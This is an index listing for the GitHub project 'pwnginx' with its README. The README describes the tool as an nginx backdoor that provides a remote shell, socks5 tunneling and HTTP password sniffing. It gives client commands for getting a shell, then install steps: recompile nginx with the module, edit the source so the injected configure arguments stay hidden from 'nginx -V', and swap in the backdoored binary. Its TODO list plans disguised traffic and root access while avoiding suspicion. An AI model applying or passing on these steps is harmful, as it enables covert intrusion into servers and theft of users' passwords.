Ecosyste.ms: Awesome

An open API service indexing awesome lists of open source software.

Awesome Lists | Featured Topics | Projects

https://github.com/t57root/pwnginx

Pwn nginx - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing.
https://github.com/t57root/pwnginx

backdoor nginx pwn-nginx socks5-tunneling

Last synced: 3 months ago
JSON representation

Pwn nginx - a nginx backdoor provides shell access, socks5 tunneling, http password sniffing.

Awesome Lists containing this project

README 

        
#[ Pwnginx ] - Pwn nginx



Copyleft by t57root @ openwill.me



<[email protected]>  [www.HackShell.net](http://www.hackshell.net/)



Usage:



Get shell access via the nginx running @ [ip]:[port]



    ./pwnginx shell [ip] [port] [password]



Get a socks5 tunnel listening at [socks5ip]:[socks5port]



    ./pwnginx socks5 [ip] [port] [password] [socks5ip] [socks5port]



###Features:

    

* Remote shell access



* Socks5 tunneling via existing http connection



* Http password sniffing & logging



###INSTALL:



* Compile the client:



    $ cd client;make



* Edit source to hidden configure arguments:



    $ vim src/core/nginx.c

    

    Modify the `configure arguments` line into: `configure arguments: --prefix=/opt/nginx\n");` (original configure arguments shown in the result of `nginx -V`)



* Recompile nginx:



    $ cd /path/to/nginx/source; ./configure --prefix=/opt/nginx --add-module=/path/to/pwnginx/module && make (There is no need to run `make install`)



    $ sudo cp -f objs/nginx /path/to/nginx/sbin/nginx



* Restart nginx



    $ sudo killall nginx && /path/to/nginx/sbin/nginx



###TODO:



* Pack communication traffic into HTTP protocol



* Full pty support



* Shell with root privilege(? There must be another stand-alone 'nginx: master process' running under root to support this function. Maybe that's too suspicious. Being considered.)